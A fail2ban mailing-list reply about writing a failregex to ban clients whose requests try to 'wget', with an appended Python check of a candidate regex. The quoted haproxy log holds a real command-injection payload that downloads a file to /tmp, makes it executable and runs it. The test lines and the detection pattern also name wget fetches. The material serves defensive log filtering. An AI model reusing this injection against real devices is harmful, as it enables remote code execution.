List: fail2ban-users
Subject: Re: [Fail2ban-users] Ban IPs that try to "wget" in the request
From: James Moe via Fail2ban-users <fail2ban-users () lists ! sourceforge ! net>
Date: 2018-11-24 21:08:11
Message-ID: 5771c86c-d841-a140-8c48-da5aaa90e841 () sohnen-moe ! com
On 24/11/2018 6.58 AM, Kevin S/Lucas Y wrote:
> I try to ban IPs that try to wget something into my server.
> How am I going to do the failregex?
> For example:
> Nov 20 18:04:28 ubuntu haproxy[12789]: ***********:39636
> [20/Nov/2018:18:04:28.627] http_front http_back/main 286/0/4/25/315 400
> 392 - - ---- 0/0/0/0/0 0/0 "GET
> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com
> <http://google.com>&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.U \
> ser1.Password%3E$(cd%20/tmp;%20wget%20http://***********/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin
> HTTP/1.1"
>
Without a source IP address for the <HOST>, there is no regex to match
the given text.
--
James Moe
moe dot james at sohnen-moe dot com
520.743.3936
Think.
_______________________________________________
Fail2ban-users mailing list
Fail2ban-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/fail2ban-users
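
To illustrate the reply above, here is an added example (not part of the original messages and not fail2ban's own code): a candidate failregex for this haproxy log layout, run against constructed log lines with and without a client address. The `<HOST>` expansion is a simplified IPv4-only stand-in, the regex is a hypothetical suggestion, and the addresses are documentation-range values.

```python
import re

# Assumption: simplified IPv4-only stand-in for what fail2ban substitutes
# for <HOST> (the real expansion also covers IPv6 and hostnames).
HOST_GROUP = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"

# Hypothetical failregex for the haproxy HTTP log layout quoted in the thread:
# "haproxy[pid]: client_ip:port [accept date] frontend backend/server timers status ..."
FAILREGEX = (
    r'haproxy\[\d+\]: <HOST>:\d+ \[[^\]]+\] \S+ \S+ \S+ \d{3} '
    r'.*"(?:GET|POST|HEAD) \S*wget(?:%20|\+)\S* HTTP/'
)

def compile_failregex(failregex):
    """Expand <HOST> into a named group; refuse a regex that has none."""
    if "<HOST>" not in failregex:
        raise ValueError("failregex has no <HOST>, so there is nothing to ban")
    return re.compile(failregex.replace("<HOST>", HOST_GROUP), re.IGNORECASE)

def banned_host(line, pattern):
    """Return the address the filter would act on, or None if no match."""
    match = pattern.search(line)
    return match.group("host") if match else None

# Constructed sample lines (documentation-range addresses, shortened request).
PREFIX = "Nov 20 18:04:28 ubuntu haproxy[12789]: "
MIDDLE = (" [20/Nov/2018:18:04:28.627] http_front http_back/main "
          "286/0/4/25/315 400 392 - - ---- 0/0/0/0/0 0/0 ")
WGET_REQ = '"GET /cgi-bin/nobody/Search.cgi?username=admin%20;wget%20http://198.51.100.7/x HTTP/1.1"'
SAMPLES = {
    "with_ip": PREFIX + "203.0.113.45:39636" + MIDDLE + WGET_REQ,
    "masked_ip": PREFIX + "***********:39636" + MIDDLE + WGET_REQ,
    "benign": PREFIX + "203.0.113.45:39640" + MIDDLE + '"GET /docs/wget-manual.html HTTP/1.1"',
}

def check_samples():
    pattern = compile_failregex(FAILREGEX)
    return {name: banned_host(line, pattern) for name, line in SAMPLES.items()}

if __name__ == "__main__":
    for name, host in check_samples().items():
        print(f"{name}: {host or 'no match'}")
```

Against a real log file, the same check is done with the `fail2ban-regex` tool that ships with fail2ban.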